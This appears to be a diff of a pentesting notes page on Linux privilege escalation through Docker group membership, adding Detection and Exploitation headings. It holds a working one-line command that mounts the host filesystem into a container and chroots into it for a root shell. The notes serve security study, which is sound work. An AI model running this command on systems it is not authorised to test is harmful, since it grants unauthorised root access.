PentesterArchive/Privilege-Escalation/Linux/Groups Privilege Escalation/docker group PE.md

 # Docker Group Privilege Escalation.
+## Detection.
+We only need to be part of the Docker group.
+![31](https://github.com/user-attachments/assets/b7c9043b-0bf6-42ec-91cb-15c7dbd6710f)

+## Exploitation.
 If we are part of the Docker group we can do the next command to become root.

-![31](https://github.com/user-attachments/assets/b7c9043b-0bf6-42ec-91cb-15c7dbd6710f)

 ```bash
 docker run -it --rm -v /:/mnt <IMAGE_NAME> chroot /mnt bash
 ```